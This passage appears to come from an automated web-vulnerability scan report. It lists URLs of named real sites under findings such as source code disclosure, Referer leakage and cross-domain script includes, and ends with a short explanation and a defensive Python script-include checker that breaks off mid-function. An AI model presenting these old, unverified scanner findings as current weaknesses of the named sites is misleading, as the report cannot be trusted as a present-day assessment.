13.20. http://www.ibm.com/developerworks/tivoli/library/s-csscript/

13.21. http://www.ibm.com/search/csass/search/

13.22. http://www.jcp.org/en/home/index

13.23. http://www.jcp.org/en/jsr/detail

13.24. https://www.mailjet.com/signup

13.25. http://www.ted.com/js/library.min.js

13.26. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/

13.27. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/

13.28. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/

13.29. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/

13.30. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/

13.31. http://www.tmz.com/signin/

13.32. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/

13.33. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/

13.34. http://www.usenetbinaries.com/l/newsgroups.html

13.35. http://www.usenetserver.com/en/support.php

14. Source code disclosure

14.1. http://info.mailtraq.com/v/js/ncBwHlpr.js

14.2. http://resources.infolinks.com/js/221.3.5b/infolinks.js

14.3. http://resources.infolinks.com/js/222.0.4/infolinks.js

14.4. http://www.enstarllc.com/v/js/ncBwHlpr.js

14.5. http://www.ibm.com/developerworks/dwtagg/css/h3/dogear.css

14.6. http://www.mailtraq.com/v/js/ncBwHlpr.js

14.7. http://www.ted.com/js/library.min.js

15. Referer-dependent response

15.1. http://adnxs.revsci.net/imp

15.2. http://c.brightcove.com/services/viewer/federated_f9

15.3. http://cpanel.app9.hubspot.com/Inactive.aspx

15.4. http://dg.specificclick.net/

15.5. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

15.6. http://pixel.adsafeprotected.com/jspix

15.7. http://weather.yahoo.com/badge/

15.8. http://www.facebook.com/plugins/activity.php

15.9. http://www.facebook.com/plugins/like.php

15.10. http://www.facebook.com/plugins/likebox.php

15.11. http://www.mailtraq.com/30day

15.12. http://www.westhost.com/images/bluegradbg.gif

15.13. http://www.westhost.com/images/boxtopbackground.gif

16. Cross-domain POST

17. Cross-domain Referer leakage

17.1. http://3ps.go.com/DynamicAd

17.2. http://a.collective-media.net/cmadj/cm.rev_bostonherald/

17.3. http://abc.csar.go.com/DynamicCSAd

17.4. http://abc.csar.go.com/DynamicCSAd

17.5. https://accounts.usenetserver.com/register/index.php

17.6. http://ad.afy11.net/ad

17.7. http://ad.doubleclick.net/adi/N4682.126265.CASALEMEDIA/B5564795.9

17.8. http://ad.doubleclick.net/adi/N6092.yahoo.com/B5098223.106

17.9. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10

17.10. http://ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5761718.3

17.11. http://ad.doubleclick.net/adj/cm.rev_bostonherald/

17.12. http://ad.doubleclick.net/adj/tconf.ted/homepage

17.13. http://ad.doubleclick.net/adj/tmz.category.wb.dart/black_swan

17.14. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_hookups

17.15. http://ad.doubleclick.net/adj/tmz.category.wb.dart/celebrity_justice

17.16. http://ad.doubleclick.net/adj/tmz.category.wb.dart/dwts

17.17. http://ad.doubleclick.net/adj/tmz.ros.wb.dart/

17.18. http://ad.doubleclick.net/adj/tmz.toofab.wb.dart/

17.19. http://ad.turn.com/server/ads.js

17.20. https://admin.usenetbinaries.com/cgi-bin/signup

17.21. http://ads.adsonar.com/adserving/getAds.jsp

17.22. http://ads.bluelithium.com/st

17.23. http://ads.dotomi.com/ads_smokey_pure.php

17.24. http://ads.tw.adsonar.com/adserving/getAds.jsp

17.25. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js

17.26. http://afe.specificclick.net/

17.27. http://afe.specificclick.net/

17.28. http://afe.specificclick.net/

17.29. http://as.casalemedia.com/j

17.30. http://as.casalemedia.com/j

17.31. http://as.casalemedia.com/j

17.32. http://as1.suitesmart.com/99917/G15493.js

17.33. http://attuverseoffers.com/tv_hsi_bundles/includes/xml/offersS20.xml

17.34. http://attuverseoffers.com/tv_hsi_bundles/index.php

17.35. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3

17.36. http://bh.heraldinteractive.com/includes/processAds.bg

17.37. http://bh.heraldinteractive.com/includes/processAds.bg

17.38. http://bh.heraldinteractive.com/includes/processAds.bg

17.39. http://bostonherald.com/news/columnists/view.bg

17.40. http://bostonherald.com/news/national/

17.41. http://bostonherald.com/news/regional/view.bg

17.42. http://bostonherald.com/news/regional/view.bg

17.43. http://bostonherald.com/projects/your_tax_dollars.bg

17.44. http://bostonherald.com/track/inside_track/view.bg

17.45. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx

17.46. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx

17.47. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx

17.48. http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx

17.49. http://bp.specificclick.net/

17.50. http://ca.rtb.prod2.invitemedia.com/build_creative

17.51. http://ca.rtb.prod2.invitemedia.com/build_creative

17.52. http://ca.rtb.prod2.invitemedia.com/build_creative

17.53. http://ca.rtb.prod2.invitemedia.com/build_creative

17.54. http://ca.rtb.prod2.invitemedia.com/build_creative

17.55. http://ca.rtb.prod2.invitemedia.com/build_creative

17.56. http://cache2-scripts.pressdisplay.com/res/WebResource.ashx

17.57. http://cdn.polls.tmz.com/polls/34613/iframe

17.58. http://cdn.polls.tmz.com/polls/34614/iframe

17.59. http://choices.truste.com/ca

17.60. http://choices.truste.com/ca

17.61. http://cim.meebo.com/cim

17.62. http://cm.g.doubleclick.net/pixel

17.63. http://cm.g.doubleclick.net/pixel

17.64. http://cm.g.doubleclick.net/pixel

17.65. http://cplads.appspot.com/file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html

17.66. http://dg.specificclick.net/

17.67. http://duckduckgo.com/

17.68. http://googleads.g.doubleclick.net/pagead/ads

17.69. http://googleads.g.doubleclick.net/pagead/ads

17.70. http://googleads.g.doubleclick.net/pagead/ads

17.71. http://googleads.g.doubleclick.net/pagead/ads

17.72. http://googleads.g.doubleclick.net/pagead/ads

17.73. http://googleads.g.doubleclick.net/pagead/ads

17.74. http://googleads.g.doubleclick.net/pagead/ads

17.75. http://googleads.g.doubleclick.net/pagead/ads

17.76. http://googleads.g.doubleclick.net/pagead/ads

17.77. http://googleads.g.doubleclick.net/pagead/ads

17.78. http://googleads.g.doubleclick.net/pagead/ads

17.79. http://googleads.g.doubleclick.net/pagead/ads

17.80. http://googleads.g.doubleclick.net/pagead/ads

17.81. http://googleads.g.doubleclick.net/pagead/ads

17.82. http://googleads.g.doubleclick.net/pagead/ads

17.83. http://googleads.g.doubleclick.net/pagead/ads

17.84. http://googleads.g.doubleclick.net/pagead/ads

17.85. http://googleads.g.doubleclick.net/pagead/ads

17.86. http://googleads.g.doubleclick.net/pagead/ads

17.87. http://googleads.g.doubleclick.net/pagead/ads

17.88. http://googleads.g.doubleclick.net/pagead/ads

17.89. http://googleads.g.doubleclick.net/pagead/ads

17.90. http://googleads.g.doubleclick.net/pagead/ads

17.91. http://googleads.g.doubleclick.net/pagead/ads

17.92. http://googleads.g.doubleclick.net/pagead/ads

17.93. http://googleads.g.doubleclick.net/pagead/ads

17.94. http://googleads.g.doubleclick.net/pagead/ads

17.95. http://googleads.g.doubleclick.net/pagead/ads

17.96. http://googleads.g.doubleclick.net/pagead/ads

17.97. http://ib.adnxs.com/ptj

17.98. http://images.search.yahoo.com/search/images

17.99. http://info.desktone.com/gaw.hosted.virtual.desktop.free.trial.html

17.100. http://l.yimg.com/l/social_buttons/facebook-share-iframe.php

17.101. http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/national/remembering_911/home/L24/1480354666/Right/BostonHerald/Pictopia_160x600_House/Pictopia-160x600.jpg/4d686437616b35776e72734144666853

17.102. http://omg.yahoo.com/search

17.103. http://omg.yahoo.com/xhr/ad/LREC/2115806991

17.104. http://omg.yahoo.com/xhr/ad/LREC/2115806991

17.105. http://omg.yahoo.com/xhr/ad/LREC/2115823648

17.106. http://omg.yahoo.com/xhr/ad/MREC/2115823648

17.107. http://omg.yahoo.com/xhr/relatedsearch/

17.108. http://pagead2.googlesyndication.com/pagead/ads

17.109. http://pagead2.googlesyndication.com/pagead/ads

17.110. http://pagead2.googlesyndication.com/pagead/ads

17.111. http://pagead2.googlesyndication.com/pagead/ads

17.112. http://pagead2.googlesyndication.com/pagead/ads

17.113. http://pro.tweetmeme.com/button.js

17.114. http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0001075460/bnum=1532848/cstr=1532848=_4e73f209,4424437366,766159%5E1075460%5E1184%5E0,1_/xsxdata=$xsxdata/xsinvid=0/imptid=AS444cf0ddbfae44a9a3987f5d857df653

17.115. http://search.yahoo.com/search

17.116. http://secure-us.imrworldwide.com/ocr/e

17.117. http://showadsak.pubmatic.com/AdServer/AdServerServlet

17.118. http://showadsak.pubmatic.com/AdServer/AdServerServlet

17.119. http://showadsak.pubmatic.com/AdServer/AdServerServlet

17.120. http://showadsak.pubmatic.com/AdServer/AdServerServlet

17.121. http://showadsak.pubmatic.com/AdServer/AdServerServlet

17.122. http://showadsak.pubmatic.com/AdServer/AdServerServlet

17.123. http://showadsak.pubmatic.com/AdServer/AdServerServlet

17.124. http://showadsak.pubmatic.com/AdServer/AdServerServlet

17.125. http://showadsak.pubmatic.com/AdServer/AdServerServlet

17.126. http://showadsak.pubmatic.com/AdServer/AdServerServlet

17.127. http://showadsak.pubmatic.com/AdServer/AdServerServlet

17.128. http://showadsak.pubmatic.com/AdServer/AdServerServlet

17.129. http://showadsak.pubmatic.com/AdServer/AdServerServlet

17.130. http://showadsak.pubmatic.com/AdServer/AdServerServlet

17.131. http://showadsak.pubmatic.com/AdServer/AdServerServlet

17.132. http://us.adserver.yahoo.com/a

17.133. http://weather.yahoo.com/badge/

17.134. http://www-01.ibm.com/support/docview.wss

17.135. http://www-03.ibm.com/innovation/us/watson/images/arrows/arrows.png

17.136. http://www-142.ibm.com/software/products/us/en/search

17.137. http://www-304.ibm.com/support/operations/us/en/invoicespayments

17.138. http://www-304.ibm.com/support/operations/us/en/orderdelivery

17.139. http://www-935.ibm.com/services/us/igs/smarterdatacenter.html

17.140. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp

17.141. http://www.att.com/media/gvp/gvpUtils.js

17.142. http://www.bostonherald.com/mobile/view.bg

17.143. http://www.bradsdeals.com/dealsoftheday/subscribe/b

17.144. http://www.easynews.com/

17.145. http://www.facebook.com/plugins/activity.php

17.146. http://www.facebook.com/plugins/facepile.php

17.147. http://www.facebook.com/plugins/likebox.php

17.148. http://www.giganews.com/

17.149. https://www.giganews.com/signup/billing.html

17.150. http://www.google.com/search

17.151. http://www.google.com/search

17.152. http://www.ibm.com/Search/

17.153. http://www.ibm.com/developerworks/forums/thread.jspa

17.154. http://www.ibm.com/developerworks/niagara/jsp/AuthValid.jsp

17.155. http://www.ibm.com/search/csass/search

17.156. http://www.ibm.com/search/csass/search/

17.157. http://www.itoncommand.com/GetAQuote.aspx

17.158. http://www.jcp.org/en/jsr/detail

17.159. http://www.matrix42.com/downloads/wp-vdi-demystified/

17.160. http://www.mokafive.com/BetterWayVDI

17.161. http://www.redbooks.ibm.com/cgi-bin/searchsite.cgi

17.162. http://www.ted.com/js/library.min.js

17.163. http://www.ted.com/search

17.164. http://www.thundernews.com/

17.165. https://www.thundernews.com/billinginfo.php

17.166. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/

17.167. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/

17.168. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/

17.169. http://www.usenetbinaries.com/l/newsgroups.html

18. Cross-domain script include

18.1. http://3ps.go.com/DynamicAd

18.2. http://abc.csar.go.com/DynamicCSAd

18.3. https://accounts.usenetserver.com/register/index.php

18.4. http://ad.afy11.net/ad

18.5. http://ad.doubleclick.net/adi/N4682.126265.CASALEMEDIA/B5564795.9

18.6. http://ad.doubleclick.net/adi/N6092.yahoo.com/B5098223.106

18.7. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10

18.8. https://admin.usenetbinaries.com/cgi-bin/signup

18.9. http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html

18.10. http://afe.specificclick.net/

18.11. http://attuverseoffers.com/tv_hsi_bundles/index.php

18.12. http://beta.abc.go.com/shows/charlies-angels

18.13. http://beta.abc.go.com/shows/charlies-angels/bios

18.14. http://beta.abc.go.com/shows/charlies-angels/bios/eve-french

18.15. http://bgs-soft.com/Products_Sgagent.asp

18.16. http://bgs-soft.com/UsAndThem.asp

18.17. http://bh.heraldinteractive.com/includes/processAds.bg

18.18. http://bh.heraldinteractive.com/includes/processAds.bg

18.19. http://bh.heraldinteractive.com/includes/processAds.bg

18.20. http://blekko.com/

18.21. http://blekko.com/ws/radius+server

18.22. http://blog.ted.com/

18.23. http://bostonherald.com/entertainment/

18.24. http://bostonherald.com/news/

18.25. http://bostonherald.com/news/columnists/view.bg

18.26. http://bostonherald.com/news/national/

18.27. http://bostonherald.com/news/regional/view.bg

18.28. http://bostonherald.com/projects/your_tax_dollars.bg

18.29. http://bostonherald.com/track/

18.30. http://bostonherald.com/track/inside_track/view.bg

18.31. http://bostonherald.com/track/inside_track/view/20110907sox_with_heels/

18.32. http://bostonherald.com/track/star_tracks/view/20110915cameron_and_tyler_winklevoss_to_star_in_tv_ad/srvc=track&position=also

18.33. http://bostonheraldnie.newspaperdirect.com/epaper/homepage_v2.aspx

18.34. http://bostonheraldnie.newspaperdirect.com/epaper/viewer.aspx

18.35. http://cdn.optmd.com/V2/80181/197812/index.html

18.36. http://cdn.polls.tmz.com/polls/34613/iframe

18.37. http://cdn.polls.tmz.com/polls/34614/iframe

18.38. http://cplads.appspot.com/file/104441593408970093297/AIO_300x250_6_27_2011/1309205690/GoogleForm_dp.html

18.39. http://d14.zedo.com//ads3/k/951/887163/3853/1000007/i.js

18.40. http://forums.cpanel.net/calendar.php

18.41. http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html

18.42. http://freeradius.org/

18.43. http://gallery.pictopia.com/bostonherald/

18.44. http://googleads.g.doubleclick.net/pagead/ads

18.45. http://googleads.g.doubleclick.net/pagead/ads

18.46. http://info.desktone.com/cloudhosted.virtual.desktop.free.trial.html

18.47. http://info.desktone.com/gaw.hosted.virtual.desktop.free.trial.html

18.48. http://info.mailtraq.com/imap

18.49. http://info.mailtraq.com/wac

18.50. http://l.yimg.com/l/social_buttons/facebook-share-iframe.php

18.51. http://members.westhost.com/v2/AddFavorites.js

18.52. http://members.westhost.com/v2/images/Icon-Install.gif

18.53. http://members.westhost.com/v2/images/bgmembers.gif

18.54. http://members.westhost.com/v2/images/diagram_imap.gif

18.55. http://members.westhost.com/v2/images/diagram_pop3.gif

18.56. http://members.westhost.com/v2/images/dotted_underline.gif

18.57. http://members.westhost.com/v2/images/hi_imap.gif

18.58. http://members.westhost.com/v2/images/larrow.gif

18.59. http://members.westhost.com/v2/images/printpage.gif

18.60. http://members.westhost.com/v2/images/v1_checkbox.gif

18.61. http://members.westhost.com/v2/menu_settings_members.js

18.62. http://members.westhost.com/v2/menu_styles.css

18.63. http://members.westhost.com/v2/scripts/cbrowser_dom.js

18.64. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/admtmz/ros/300x250/jx/ss/a/1290982822@x15

18.65. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/admtmz/ros/728x90/jx/ss/a/1708544459@Top1

18.66. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com//your_tax_dollars_at_work@Top,Bottom!Bottom

18.67. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com//your_tax_dollars_at_work@Top,Bottom!Top

18.68. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Bottom

18.69. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Middle1

18.70. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/entertainment/home@Top,Middle,Middle1,Bottom!Top

18.71. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1321816395@x12

18.72. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1359771821@x12

18.73. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1779944804@x11

18.74. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/mobile/home/1969994821@x11

18.75. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle

18.76. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Middle1

18.77. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Right

18.78. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/columnists/article@Top,Right,Middle,Middle1,Bottom!Top

18.79. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Bottom

18.80. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle

18.81. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle

18.82. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1

18.83. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Middle1

18.84. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top

18.85. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,Middle,Middle1,Bottom!Top

18.86. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Bottom

18.87. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle1

18.88. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Top

18.89. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Bottom

18.90. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Middle

18.91. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Middle1

18.92. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/national/remembering_911/home@Top,Middle,Middle1,Right,Bottom!Top

18.93. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Middle

18.94. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Right

18.95. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/regional/article@Top,Right,Middle,Bottom!Top

18.96. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/sports/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom!Middle

18.97. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Bottom

18.98. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

18.99. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

18.100. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle

18.101. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Middle1

18.102. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/home@Top,Middle,Middle1,Bottom!Top

18.103. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Bottom

18.104. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Right

18.105. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Bottom!Top

18.106. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Bottom

18.107. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Middle

18.108. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Right

18.109. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/inside_track/article@Top,Right,Middle,Bottom!Top

18.110. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Bottom

18.111. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Right

18.112. http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/track/star_tracks/article@Top,Right,Bottom!Top

18.113. http://omg.yahoo.com/

18.114. http://omg.yahoo.com/photos/what-were-they-thinking/5203

18.115. http://pro.tweetmeme.com/button.js

18.116. http://r1-ads.ace.advertising.com/site=791296/size=300250/u=2/bnum=67593853/hr=0/hl=12/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=

18.117. http://r1-ads.ace.advertising.com/site=804034/size=728090/u=2/bnum=48830520/hr=0/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftag.admeld.com%252Fad%252Fiframe%252F221%252Ftmz%252F728x90%252Fhomepage_btf%253Ft%253D1316238825238%2526tz%253D300%2526m%253D0%2526hu%253D%2526ht%253Djs%2526hp%253D0%2526fo%253D%2526url%253Dhttp%25253A%25252F%25252Fwww.tmz.com%25252F%2526refer%253D

18.118. http://squirrelmail.org/index.php

18.119. http://squirrelmail.org/plugins.php

18.120. http://squirrelmail.org/support/

18.121. http://squirrelmail.org/wiki/MailServerIMAPProblem

18.122. http://us.adserver.yahoo.com/a

18.123. http://weather.yahoo.com/badge/

18.124. http://www-304.ibm.com/support/operations/us/en/invoicespayments

18.125. http://www-304.ibm.com/support/operations/us/en/orderdelivery

18.126. http://www.actvalue.com/

18.127. http://www.actvalue.com/pages/asp/editorial/ps_rfid.asp

18.128. http://www.alepo.com/isp-billing.shtml

18.129. http://www.alepo.com/radius-server.shtml

18.130. http://www.alepo.com/wifi.shtml

18.131. http://www.aradial.com/

18.132. http://www.att.com/u-verse/availability/

18.133. http://www.bostonherald.com/mobile/

18.134. http://www.bostonherald.com/mobile/info.bg

18.135. http://www.bostonherald.com/mobile/view.bg

18.136. http://www.bostonherald.com/news/

18.137. http://www.bradsdeals.com/dealsoftheday/subscribe/b

18.138. http://www.courier-mta.org/imap/

18.139. http://www.courier-mta.org/imap/header.html

18.140. http://www.cpanel.net/

18.141. http://www.desktone.com/

18.142. http://www.disenter.com/disenter.css

18.143. http://www.disenter.com/favicon.ico

18.144. http://www.elfqrin.com/hacklab/pages/nntpserv.php

18.145. http://www.facebook.com/plugins/activity.php

18.146. http://www.facebook.com/plugins/facepile.php

18.147. http://www.facebook.com/plugins/likebox.php

18.148. http://www.giganews.com/

18.149. https://www.giganews.com/signup/

18.150. https://www.giganews.com/signup/billing.html

18.151. http://www.ibm.com/developerworks/dwtagg/js/dojo/resources/blank.gif

18.152. http://www.ibm.com/developerworks/forums/thread.jspa

18.153. http://www.ibm.com/developerworks/java/

18.154. http://www.ibm.com/developerworks/java/find/standards/

18.155. http://www.ibm.com/developerworks/niagara/jsp/AuthValid.jsp

18.156. http://www.ibm.com/developerworks/rational/library/08/0325_segal/index.html

18.157. http://www.ibm.com/developerworks/tivoli/library/s-csscript/

18.158. http://www.ibm.com/products/us/en/

18.159. http://www.ibm.com/search/csass/search/

18.160. http://www.ibm.com/us/en/

18.161. http://www.interlinknetworks.com/

18.162. http://www.interlinknetworks.com/applications.htm

18.163. http://www.interlinknetworks.com/pricing.htm

18.164. http://www.interlinknetworks.com/products/on2-4-1radseries.htm

18.165. http://www.interlinknetworks.com/rad.htm

18.166. http://www.interlinknetworks.com/services.htm

18.167. http://www.mailjet.com/

18.168. http://www.mailjet.com/features

18.169. http://www.mailjet.com/pricing

18.170. https://www.mailjet.com/signup

18.171. http://www.mailtraq.com/30day

18.172. http://www.matrix42.com/fileadmin/jScripts/video_box.js

18.173. http://www.mokafive.com/BetterWayVDI

18.174. http://www.mokafive.com/products/compare-mokafive.php

18.175. http://www.mokafive.com/products/products-overview.php

18.176. http://www.mokafive.com/solutions/desktop-and-laptop-management.php

18.177. http://www.mokafive.com/solutions/outsourcing.php

18.178. http://www.mokafive.com/solutions/solutions-overview.php

18.179. http://www.radius-server.net/

18.180. http://www.spotngo.ca/

18.181. http://www.ted.com/

18.182. http://www.ted.com/initiatives

18.183. http://www.ted.com/search

18.184. http://www.ted.com/themes/browse

18.185. http://www.ted.com/webcast/archive/event/ibmwatson

18.186. http://www.thundernews.com/

18.187. http://www.thundernews.com/signup.php

18.188. https://www.thundernews.com/billinginfo.php

18.189. http://www.tmz.com/

18.190. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/

18.191. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/

18.192. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/

18.193. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/

18.194. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/

18.195. http://www.tmz.com/reset-password/

18.196. http://www.tmz.com/signin/

18.197. http://www.toofab.com/

18.198. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/

18.199. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/

18.200. http://www.toofab.com/category/celeb-couples/

18.201. http://www.toofab.com/news/

18.202. http://www.usenetbinaries.com/l/newsgroups.html

18.203. http://www.virtuecom.com/

18.204. http://www.westhost.com/images/bluegradbg.gif

18.205. http://www.westhost.com/images/boxtopbackground.gif
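The "Cross-domain script include" entries above are raised whenever a page loads `<script src=...>` from a host other than its own, which hands that third party full script execution in the page's origin. The following is an added example, not code from the XSS.CX report or any of the listed sites: a small finder that resolves every script src against the page URL and reports the ones whose origin differs, along with whether a Subresource Integrity attribute is present. The page URL and HTML below are constructed sample data.

```python
"""Flag <script src> references whose origin differs from the page's origin."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _ScriptSrcCollector(HTMLParser):
    """Collects the src (and integrity) attribute of every <script> tag."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
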